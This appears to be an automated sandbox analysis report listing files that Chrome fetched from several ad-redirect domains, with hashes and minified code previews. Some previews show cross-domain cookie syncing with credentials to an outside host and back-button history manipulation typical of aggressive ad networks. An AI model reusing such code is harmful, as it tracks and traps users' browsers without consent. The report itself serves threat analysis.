                                                                                                          SSDEEP:3:YCMxvUud+lTjc3RBXVEBWxXMcYU:YCM5aTj+rcXU
                                                                                                          MD5:A8682CECC8DCFEFD4F6922B117413A78
                                                                                                          SHA1:55287FF51A434F80FB0F91D558324DACD5ECE585
                                                                                                          SHA-256:A0218BB3DC13DB0C927F5FB02478F63CFB7953AF0886B3A1B3016690448818E4
                                                                                                          SHA-512:B9479363669F1599260F11F505C7613639803F1C4082869CAB4CC712DC6CA2866D2E1ABEE60CEDC41225F66710FD23818079B0F895388B986FE3D80F34FFCE3E
                                                                                                          Malicious:false
                                                                                                          Preview:{"gid":"1zy28050kovbfyyc4yz4gsq62pkmaxhb","skipSubscribe":false}.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:dropped
                                                                                                          Size (bytes):264
                                                                                                          Entropy (8bit):7.010495837839042
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:wk5ZaWS08/WdhOAs62IfG8Vv1e9AtBaup:wZjW/OAzeIv0Ktf
                                                                                                          MD5:606085E7A74FD169DA34F9FCB43AD12D
                                                                                                          SHA1:77226A50488FB48256D36F1810A136B69D635F74
                                                                                                          SHA-256:DF20F4C1D87CB10514A6D526DDE70759334705D90A909DF0E6CB130061CE1EA5
                                                                                                          SHA-512:C86B56D3733B3C6C6E50C17629DC44438730D0AE1D75F4330683EEDA0623A522AC9DE55BC47B1353ABE77C70C01650CFB142740E55E6E504CBD053A0FA85DF3F
                                                                                                          Malicious:false
                                                                                                          Preview:RIFF....WEBPVP8 .........*d.d.>.`.M(&#.-.x....g....m...A%].{n..X.j..B......%N......U....9...^...H.....9t.....dlJ.L.@.E...8.......LYD....G8s?..G..F....S..|5./.'...X.8g....T}FJP.5....jF...]^.....g.1+~......hk.....9@.ZdX.H...Hy........._.6a43S......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2652
                                                                                                          Entropy (8bit):4.03430190928323
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:hKQPXXvNekuSRtRtRxZFo0Fmsowke7EwiViZp+0piiXFDXFziViZp/XFDXFxjiVG:hKUF7Z1Fae7EwEi6KXXFDXFzEirXFDXZ
                                                                                                          MD5:00013844F5058C3D9B228F6BFD995569
                                                                                                          SHA1:3C9C13C8ABD170C1A288F2AF3A113843ABB701C0
                                                                                                          SHA-256:15E40D2556A41B58542367F158EA96C0949EB3FAFECF930CF1A7653167910B9B
                                                                                                          SHA-512:FD53F7618B1BEA8B435040E17BA092692082C1ACDC0D8596C4D45CFE10DF77D6638D25E97BBAADFDCCB1CD94A69518FD2EF5060DCAE2E5E702FC00C181DC7DA6
                                                                                                          Malicious:false
                                                                                                          Preview:<svg height="512" width="512" xmlns="http://www.w3.org/2000/svg"><path fill="#fff" d="M445 167.364c4.143 0 7.5-3.357 7.5-7.5V107.5c0-12.406-10.094-22.5-22.5-22.5h-7.5V65c0-12.406-10.094-22.5-22.5-22.5h-7.5v-20C392.5 10.094 382.406 0 370 0H82C69.593 0 59.5 10.094 59.5 22.5v41.365c0 4.143 3.358 7.5 7.5 7.5s7.5-3.357 7.5-7.5V22.5c0-4.136 3.364-7.5 7.5-7.5h288c4.136 0 7.5 3.364 7.5 7.5v382c0 4.136-3.364 7.5-7.5 7.5H82c-4.136 0-7.5-3.364-7.5-7.5V95.865c0-4.143-3.358-7.5-7.5-7.5s-7.5 3.357-7.5 7.5V404.5c0 12.406 10.093 22.5 22.5 22.5h7.5v20c0 12.406 10.093 22.5 22.5 22.5h7.5v20c0 12.406 10.093 22.5 22.5 22.5h288c12.406 0 22.5-10.094 22.5-22.5V191.679c0-4.143-3.357-7.5-7.5-7.5s-7.5 3.357-7.5 7.5V489.5c0 4.136-3.364 7.5-7.5 7.5H142c-4.136 0-7.5-3.364-7.5-7.5v-20h185.367c4.143 0 7.5-3.357 7.5-7.5s-3.357-7.5-7.5-7.5H112c-4.135 0-7.5-3.364-7.5-7.5v-20H370c12.406 0 22.5-10.094 22.5-22.5v-347h7.5c4.136 0 7.5 3.364 7.5 7.5v382c0 4.136-3.364 7.5-7.5 7.5h-48.319c-4.143 0-7.5 3.357-7.5 7.5s3.357 7.5 7.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (41027)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):481611
                                                                                                          Entropy (8bit):5.525163267905917
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:H6y1586NSKo3wJADIoaEPLKTdQiEmFTgsb6Et0//Uuhwnyk:am86pcIrEzKTQuttI72
                                                                                                          MD5:2560EE19281892D52123113EB3249410
                                                                                                          SHA1:FCA4FE0A2CF5CD2D4256EDE69946468AB075D61F
                                                                                                          SHA-256:82E1D562D9944F7EA8DE3F8B742CAE55801472705AA581B480D3F875CA5EDAA5
                                                                                                          SHA-512:5658163CD5FEDCDC1735C31BF75F0117979E26E6440E47F909ED29EBA095799502707931492691BAAB0E34EF4FD1AB1CBF94DFC10812DB93016183D8C3F40D8A
                                                                                                          Malicious:false
                                                                                                          Preview:var d0=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var V2=d0((hn,vn)=>{(function(){const t=document.createElement("link").relList;if(t&&t.supports&&t.supports("modulepreload"))return;for(const o of document.querySelectorAll('link[rel="modulepreload"]'))r(o);new MutationObserver(o=>{for(const i of o)if(i.type==="childList")for(const a of i.addedNodes)a.tagName==="LINK"&&a.rel==="modulepreload"&&r(a)}).observe(document,{childList:!0,subtree:!0});function n(o){const i={};return o.integrity&&(i.integrity=o.integrity),o.referrerPolicy&&(i.referrerPolicy=o.referrerPolicy),o.crossOrigin==="use-credentials"?i.credentials="include":o.crossOrigin==="anonymous"?i.credentials="omit":i.credentials="same-origin",i}function r(o){if(o.ep)return;o.ep=!0;const i=n(o);fetch(o.href,i)}})();/**.* @vue/shared v3.5.13.* (c) 2018-present Yuxi (Evan) You and Vue contributors.* @license MIT.**//*! #__NO_SIDE_EFFECTS__ */function Us(e){const t=Object.create(null);for(const n of e.split(","))t[n]=1;re
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (7077), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7077
                                                                                                          Entropy (8bit):5.499355571075943
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Op8BGH5utfaGbPta040v8HSAltggs9iB97ndbgukthsNFiO4VXtPi1k64Xf4b39f:XvLaUYdbrKgFiOAPyb3f1nn
                                                                                                          MD5:F75C7E1547234B30C056BCCA3538AD06
                                                                                                          SHA1:D8FA1FC30878410899B86F0FF1E2491CC812DAFF
                                                                                                          SHA-256:3A416CA22375D5C1855470FA0BA693579AF18C2D089EBBB5A7B945CDA9370774
                                                                                                          SHA-512:28B7F4058851A3666BF837C7C6F164323FBE0857A6E1EC40BB179B63034B4177AC30498E06FBF24F799401262BAA28B9EC506B35486D0D848C2E672BC419C721
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[96950],{2798:function(e,n,t){t.d(n,{d:function(){return b}});var r=t(70865),i=t(96670),o=t(24156),a=t(17969),s=t(71961),c=t(31456),u=t(87722),l=t(97897),d=t(53444),v=t(29754),f=t(19495),E=t(77261),b=function(e){var n=e.isConversionEnabled,t=e.audienceForConversion,b=e.goal,_=e.isAnalyticsEnable,N=(0,f.bp)().state,I=(0,E.M)().syncMetric,C=Boolean(v.H.get("isDisableConversion","session")),S=N.userData,O=N.shouldTriggerConversion,g=N.isWithinConversionTime,h=N.nonUnique,p=N.adex,D=N.iframe,m=N.conversionProbability,R=D.isIframe,w=p.status,y=h.isNonUniqueCross,U=S.subId;return{conversion:function(){if(!function(){var e=Math.random(),t=e<=m;return d.n.conv?((0,s.cM)("Conversion is disabled via URL param",d.n.conv),_&&I({event:l._.CONVERSION_DISABLED_URL_PARAM}),!0):a.yG?((0,s.cM)("Conversion does not get triggered in the dev mode"),_&&I({event:l._.CONVERSION_DISABLED_DEVELOPMENT_MODE}),!0):n?U||d.n.s?O?g?y?((0,s.cM)("User
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1150
                                                                                                          Entropy (8bit):2.3031661149070852
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:XVl/F/1/l/9ur/xr//r/TCr/cr/cr/cpDQgP:Xn/F/1/l/9s/h/T/s/e/e/QQs
                                                                                                          MD5:91ABE01116AB422C598E9C8AF72CF4DA
                                                                                                          SHA1:0F2815FE8E067D48537AD168225AB4674271FA27
                                                                                                          SHA-256:B1D7AEF06456FE7431124129A28F0138BB5FCCFA4F4161E3087DE23C005E5EDC
                                                                                                          SHA-512:A4D5B20C3014153B6B382C43404917BD2CB5BD2A59BB1E981F5A19EB7DBDEC185ACE288E9700428D24E5AC623E45D04905E706F0C45A1642B1AA6C091213C23C
                                                                                                          Malicious:false
                                                                                                          URL:https://azz.underbellymeet.asia/favicon.ico
                                                                                                          Preview:............ .h.......(....... ..... .............................................................................................................H.?8........................................................I.@.I.A.H.Ai................................................I.@.I.A.I.A.I.A.H.Ai........................................I.@.I.A.I.A.I.A.I.A.I.A.H.Ai................................I.@.I.A.I.A.I.A.I.A.I.A.I.A.I.A.H.Ai........................I.@.I.A.I.A.I.A.I.?.I.A.I.A.I.A.I.A.I.A.H.Ai....................I.AyI.A.I.A.I.?.G.@K....I.AeI.A.I.A.I.A.I.A.H.Ai....................H.@{I.?.G.@K............I.AeI.A.I.A.I.A.I.A.H.Ai....................F.?$....................I.AeI.A.I.A.I.A.I.A.H.Ai............................................I.AeI.A.I.A.I.A.I.A.H.Ai............................................I.AeI.A.I.A.I.A.I.A.H.Ai............................................I.AeI.A.I.A.I.A.H.A.................................................I.AeI.A.H.A...............................................
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (14065), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14065
                                                                                                          Entropy (8bit):5.417986406521914
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Nz0XHfZkkvJ4M7/ucgEwAzW4882lMY+vW7rAlD01GfAYXPct+E9OQO9UH8+SQBk8:N0X1x772AzZYT7r4D6TY/ct+kjOeY8
                                                                                                          MD5:F45DE52B71FFBAAB0AF7B835959FE830
                                                                                                          SHA1:7044C236F92EB3E1732ADFEB4BA7E9607204EDF3
                                                                                                          SHA-256:025E230CDBE76D6D9BDAC4B557C17599F9EB0A519BC7F7FFC216E44AFCD37DC2
                                                                                                          SHA-512:ECB83C6804B2802C2E602F5D943E70703750F3B07304A802E6021E065394475774A78DE05062D69F4E2E52DB9D3DB43845F44EEC26B39CA2E4CDA81A7A772F6B
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[73557],{9097:function(n,i,e){e.d(i,{A:function(){return d}});var t=e(98788),o=e(42838),r=e(70865),a=e(96670),c=e(22970),s=e(29505),u=e(13923),l=e(71961),d=function(){var n=(0,t.Z)((function(n){var i,e,t,d,f,m,v,h,k,p;return(0,c.__generator)(this,(function(c){switch(c.label){case 0:i=n.cookiesForCheck,e=n.shouldKeepAlive,t=void 0!==e&&e,d=n.customCookieLifetime,f=i.map((function(n){var i=parseInt("604800",10);return(0,a.Z)((0,r.Z)({},n),{value:void 0!==n.value?n.value.toString():void 0,defaultTtl:i})})),(0,l.cM)("checkCrossDomainCookie - data to /sync-do: ".concat(JSON.stringify(f,null,2))),c.label=1;case 1:return c.trys.push([1,6,,7]),[4,fetch("".concat("https://forspearowor.com","/sync-do"),{method:"POST",cache:"no-cache",keepalive:t,credentials:"include",headers:{"Content-Type":"application/json"},body:JSON.stringify(f)})];case 2:return(m=c.sent()).ok?[3,4]:[4,m.text()];case 3:return v=c.sent(),console.error("check
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (379), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):379
                                                                                                          Entropy (8bit):5.845083836181435
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrzf4J/eD9lLjwMsNoiJxHHNa8tNsoS57s0skl/OGOCTaH3JpHIdiQT:+dbjzfKehlLUjCCG8tJSl/OGOK23Judl
                                                                                                          MD5:6849AF83D4A45731B6328054CE82DBD3
                                                                                                          SHA1:E6E201092AAA24AE08312D40BD4344F9B751D10A
                                                                                                          SHA-256:ED758EBF60183601C319D0F351572BEA7E665A7553DE85DA1AD183CB1FEB5B32
                                                                                                          SHA-512:49C7054C8BE125573FD9B40698AF4F04033A86D10D13277094DFC720C1B2584D55E700260FBE65181237631D049462681411072017388852F79866BE6B1F2EF2
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/f23d1daac59993b6-1736072686539.c517d511b765818c.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[44066],{44066:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_1.ed283ef5.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlYAAABXRUJQVlA4IEoAAADwAQCdASoIAAgAAkA4JQBOgMUAyZYG2wAAyXKexwGcAPe06+0VQdWSHJhfPy+D1ef8t2z/WLs6jKhVZ2iNzJqKdZZtyxESc2gAAA==",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (387), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):387
                                                                                                          Entropy (8bit):5.854985535017326
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrgcXr4eD9lLjH8TduNoiJxHHNaSWGshI2Jz7m+bust1IdiQLf:+dbjeehlLD8ICCGJJXajdiQT
                                                                                                          MD5:ED7D331FB16AFAD772733F74A3F0748A
                                                                                                          SHA1:0C29D0F3DA8CDD61B9C83B626ABE7E164D9B3938
                                                                                                          SHA-256:A78559BE932BF323D012B0F3EDDF31E1877CB7757FBA7C7B8218E01DD9168C9D
                                                                                                          SHA-512:8EA81EBACB045FF93040C01E6075D7CBDCA60CEAFBF1DB9ED38AB6C954357223E8D36DCFB386ED3E7E1CC83DE75AB2732E398154D9AED2DCCEC3E0904DAF92FC
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[39807],{39807:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/m_4.459e7d96.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlwAAABXRUJQVlA4IFAAAADQAQCdASoIAAgAAkA4JQBOgCPtuar0wAD+7SqVWbl09bUkF+P+Jn33Y4i8vsy57g564Z93RA7VeWszgsFIpzsSfwFt1VneZwEQj95pRoAAAA==",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (43597), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):43597
                                                                                                          Entropy (8bit):5.384195937245985
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:cd/ZsIAklmYzhivaEZxNHpFCkVeVOcXJVA4CCVzCgR:+sBp0jsxJ3FVxcXJVAQ7R
                                                                                                          MD5:B50FEAF502124FE6E36A331A7A49B78F
                                                                                                          SHA1:C8B5F6E628F9730F4804BD6358D2F1C9359BF064
                                                                                                          SHA-256:9029CE95458EDE9AE338DC5E333033B4D5DA23108D7D12D1FAB12983D0F1D718
                                                                                                          SHA-512:9A7692B8C7CF065371C750309A4E782ECC2A90741362F48288E6E49C32F64DB8311C6951B031ED1037B7672E4A6763266D7379FCC571E21B78BBEE002CDD29D3
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/4f5ddda985b24b74-1736072686539-595e9d9ff8fe596a.js
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[92888],{13421:function(e,r){"use strict";r.parse=function(e,r){if("string"!==typeof e)throw new TypeError("argument str must be a string");var t={},n=(r||{}).decode||o,i=0;for(;i<e.length;){var s=e.indexOf("=",i);if(-1===s)break;var u=e.indexOf(";",i);if(-1===u)u=e.length;else if(u<s){i=e.lastIndexOf(";",s-1)+1;continue}var c=e.slice(i,s).trim();if(void 0===t[c]){var l=e.slice(s+1,u).trim();34===l.charCodeAt(0)&&(l=l.slice(1,-1)),t[c]=a(l,n)}i=u+1}return t},r.serialize=function(e,r,o){var a=o||{},s=a.encode||i;if("function"!==typeof s)throw new TypeError("option encode is invalid");if(!n.test(e))throw new TypeError("argument name is invalid");var u=s(r);if(u&&!n.test(u))throw new TypeError("argument val is invalid");var c=e+"="+u;if(null!=a.maxAge){var l=a.maxAge-0;if(isNaN(l)||!isFinite(l))throw new TypeError("option maxAge is invalid");c+="; Max-Age="+Math.floor(l)}if(a.domain){if(!n.test(a.domain))throw new TypeError("option d
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):384
                                                                                                          Entropy (8bit):5.80989092163681
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrZYeD9lLjRGyKGhBONoiJxHHNaKtNRWha7snDS1ChfqodiQLf:+dbjZYehlL0ydyCCGs63DS1IqodiQT
                                                                                                          MD5:2C41CE6EC385DE8A0BE8A60E40FC1D6A
                                                                                                          SHA1:B84D6AFF31E46CB88657F3999A0F0167D5AF4568
                                                                                                          SHA-256:A835124FA24F139BA93010A30BF735C693818D1895B88EE8D9AF4279F81079B5
                                                                                                          SHA-512:32788A78262BBD97C97CFD43EC58B50E7269983728346D9865DC9ED7835280FAB5424EBA5EF8D131269C8A50C17732FE674D292FA6AAB15F714D276302F3A87E
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[67770],{67770:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_47.ce238dc0.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAADwAQCdASoIAAgAAkA4JQBOgCBvvkCmGgAA/vG/f9mwqYpiw+9a8eqV5JEM8tXsgq4k+HkQlZ47HAYhrgpkZpO+e5aokehygdlmLJ1wAAA=",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (384), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):384
                                                                                                          Entropy (8bit):5.835059888755953
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrmol44LtNQ3lLjqgHuNoiJxHHNaKtNRWha7sURSyhtPQNqJbsjYUcc:+dbjm9GtC3lLWvCCGs6Y1hVQEJbsjYzc
                                                                                                          MD5:5C716A3BFE6F7CF6CCBC6ED8F2254BCB
                                                                                                          SHA1:4B4D84170CA295DF77A69559CEE4759DBBC8B6C6
                                                                                                          SHA-256:B4E594E32FB1A3FF5B99EE993835A5C43CD14615C258E5CB90255FA3CBBFA35D
                                                                                                          SHA-512:2C3E0945B0721085F970DEDF54F9694952951B1647D5018B00115868B2B646432A208A0CEA7CB023EDD92E3F0A6B4D031F58BE25474794CAD7066D4ACBE14A91
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/b79dd0dbaf68b5b4-1736072686539.3b548827f7eb8d6d.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[58440],{58440:function(A,t,e){e.r(t),t.default={src:"/_next/static/media/f_14.3f9cde6f.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRloAAABXRUJQVlA4IE4AAADwAQCdASoIAAgAAkA4JQBOgMV47Zk4NHAA/mFjtO9tdHxWMdEvPxrwSrAdn5mjBL3BAmQUPTEaEGw8k9QdQvnsOZTS1FOsTk7EnftUAAA=",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):109702
                                                                                                          Entropy (8bit):5.306660026357081
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:5V8ZH0wowcd8HOlXMGSCJtIDqsSZHRTUR:3WHH+32qnT2
                                                                                                          MD5:FA92E582B2C89BE329FBC8AC7170C6AC
                                                                                                          SHA1:BF03008752166780239D14094615F3D6F01D52AC
                                                                                                          SHA-256:FADD974A6921E24C69B0F37AD3CDC0F67424923522F2102B988FE11EC99A763F
                                                                                                          SHA-512:0CDB89F09E5EB5D6E0ECF60221B50345CFC8311F01FEDC025111B67798F94976B0D894C657172509B5DDE7EE85C32F3255B3AE9D0DCE721CD2D49392C4BEB15C
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/4d859cac5ba89327-1736072686539-7c9f685438bac6d8.js
                                                                                                          Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[40179],{5651:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n}},47568:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){if(Array.isArray(e))return e}},61476:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){if(Array.isArray(e))return a.default(e)};var n,a=(n=r(5651))&&n.__esModule?n:{default:n}},96385:function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){if(void 0===e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}},18282:function(e,t){"use strict";function r(e,t,r,n,a,o,i){try{var u=e[o](i),c=u.value}catch(s){return void r(s)}u.done?t(c):Promise.resolve(c).then(n,a)}t.Z=function(e){return function(){var
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 512x512, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):14024
                                                                                                          Entropy (8bit):7.986029735867096
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:8PnSZFcbOPEzu1vUcyrigDlVQSNSiVVE+7v6:8PUmtzuRyGMVQSzVVJT6
                                                                                                          MD5:B51B23F29B2F6044C821B677F7BC659C
                                                                                                          SHA1:A95FCAE33277F87C9AEB35AA0E8033D9F4416461
                                                                                                          SHA-256:DD96EE6CE02B6949DA643F74A3D202266E363B8722DB90BD0C0829EF1ACE04AC
                                                                                                          SHA-512:87BA03DC85C79C03C64815E998F28EFF3ECE98C86A87415996F713BEACF9CEC43A1C5AD6718051648FC27104540997FF967F20635ED41073BFA706677D199DE6
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/media/f_24.a0b04b39.webp
                                                                                                          Preview:RIFF.6..WEBPVP8 .6..0,...*....>m0.F$%!./2.h...gnrx:.......3......z.....@..'O2.#.V..~....}a.....Nd|C......_....o.?.'..y.o...;......._...?...a/......\.....G.....?.~9}...........P7.O._..f._........(.....{........B...o"t..}.O9...s...<.......z.1...6i.;........[....;...+.o.~....]5.;.?.>..........W.......J..q.N~..rR@.....!Y...w^0c...:.Qz_d....i.4.....m.e....V:A...M<qX..]. 8.U...2mk|e2...l.. yJ.gk,..>.N..9...-..m.P.......$......Hl...`......z..y....Ny.T.>i.w...\.iS...^..k..v.........t4:2X...N..E..b.y$..EN...........o...*.e...........%T.......!.'Q.s=.4%..&....I....nm.B.2.V..N..!..4..1.!..z..o...x.w.O.Q.$D...N^..F.E....k.iJ...u...*P.LW.m.U.z.1.t....L.`....V..T........^.....E..._!..W........T...\.I.{.<..".0.....0.aqS...?3.BB>c...uA..............TbJY..j+..u.[;..v.7".]@]...R..G.A....[...C....x-?uys[...l.W...C..........w"N...e..j,.^W.N.....iCJ.....{.H.......C*\....U.N.wG..#...C>'A.v...h....6..kQ,..d..b.....j...b..my..H.P.U.e...BD.A...=...{.0.............g..\
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):65
                                                                                                          Entropy (8bit):4.929759351356858
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:YCMxvUud+lTjc3RBXVEBWxXMcYU:YCM5aTj+rcXU
                                                                                                          MD5:A8682CECC8DCFEFD4F6922B117413A78
                                                                                                          SHA1:55287FF51A434F80FB0F91D558324DACD5ECE585
                                                                                                          SHA-256:A0218BB3DC13DB0C927F5FB02478F63CFB7953AF0886B3A1B3016690448818E4
                                                                                                          SHA-512:B9479363669F1599260F11F505C7613639803F1C4082869CAB4CC712DC6CA2866D2E1ABEE60CEDC41225F66710FD23818079B0F895388B986FE3D80F34FFCE3E
                                                                                                          Malicious:false
                                                                                                          URL:https://my.rtmark.net/gid.js?userId=1zy28050kovbfyyc4yz4gsq62pkmaxhb
                                                                                                          Preview:{"gid":"1zy28050kovbfyyc4yz4gsq62pkmaxhb","skipSubscribe":false}.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):380
                                                                                                          Entropy (8bit):5.8420098745266005
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:+hjbdHhjbzrmpeD9lLjQuNoiJxHHNaCH1s9Pk8KA6KqTgZikrCW8FCldiQLf:+dbjmpehlL0uCCGP6Kqq8sldiQT
                                                                                                          MD5:DEC9097A6FCAEBFF476CB5B57CF6016B
                                                                                                          SHA1:0FC195915F4419714CBD13F1B9DC1D57A8CBFF28
                                                                                                          SHA-256:E354F9B752FBC6662C6C2AE2F2EE980CC70ABD4CC0324FF4E17BF557CC38C5CF
                                                                                                          SHA-512:FD3F12AE73294A97D0C0A4D0FF4DD677BEC2EB6BB181C68F1C8A81EC1A70B00736E7CBBA8968B03D1E4C703AFC5C40AEC14E3F98AB04F84DDE7B6D1FDDDA2014
                                                                                                          Malicious:false
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[58376],{58376:function(A,e,t){t.r(e),e.default={src:"/_next/static/media/f_23.1ea7d609.webp",height:512,width:512,blurDataURL:"data:image/webp;base64,UklGRlgAAABXRUJQVlA4IEwAAACwAQCdASoIAAgAAkA4JQBOgB6Q/0uAAP7tLtxKFAW7b/qnrMpf/4mis4fxIygpB4Zaxq5YPVcXFMhsQE7+Hdzdetbr/LOnXWEYsgAA",blurWidth:8,blurHeight:8}}}]);
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (3779), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3779
                                                                                                          Entropy (8bit):5.354427175264234
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:UqS3MesVgwkVw592hTOsY1zINawDjJCVpvIW:dSfRwmFdXNawDwXIW
                                                                                                          MD5:46900B66E876DE517A3F8A42DA508506
                                                                                                          SHA1:E1D252B2DBE22EE02FC4003D00B792009386C701
                                                                                                          SHA-256:A8E5253C00F250E260197F5A4D5FFEF49F1538E2D44FB5F493E8E40FB79B4307
                                                                                                          SHA-512:A0B437903DDAF8674A5E6B8EC854302A9ACD54378992E3F1E2915945D34BC3992BA1E954E1DAAA36A093C37752C460D3CA97AC953161B0D7A29B48E21562D863
                                                                                                          Malicious:false
                                                                                                          URL:https://wungoangeredsa.com/_next/static/chunks/265d60a91fd3d6b8-1736072686539.748820502fe4525b.js
                                                                                                          Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[38904],{50656:function(e,n,r){r.d(n,{N:function(){return v}});var t=r(12139),o=r(61656),a=r(83216),i=r(71961),c=r(35147),u=r(21818),s=r(51659),l=r(94397),d=r(19495),f=["coajutoa.com","furgoomi.com","kabortot.com"],v=function(){var e=(0,t.useState)(0),n=e[0],r=e[1],v=(0,t.useState)(!1),p=v[0],b=v[1],k=(0,d.bp)().state,w=k.oaid,E=k.userData,h=k.passParamToParams,m=k.userAgentData,T=E.subId,P=m.data.platformVersion,y=(0,l.k)(P);(0,t.useEffect)((function(){b(function(){var e=navigator.userAgent;return/iPhone|iPad|iPod|Macintosh|Mac OS X/i.test(e)}())}),[]),(0,t.useEffect)((function(){var e=setInterval((function(){r(0)}),1e4);return function(){return clearInterval(e)}}),[]);return{initBack:function(e){var t;if(k.back.isEnabled)if(n>12&&p)(0,i.yN)("initBack: Too much pushStateToHistory");else{var l,d,v,b,E=null!==(l=k.back.historyTimeAmount)&&void 0!==l?l:3,m=null===(t=k.back.zones)||void 0===t?void 0:t.find((function(e){r
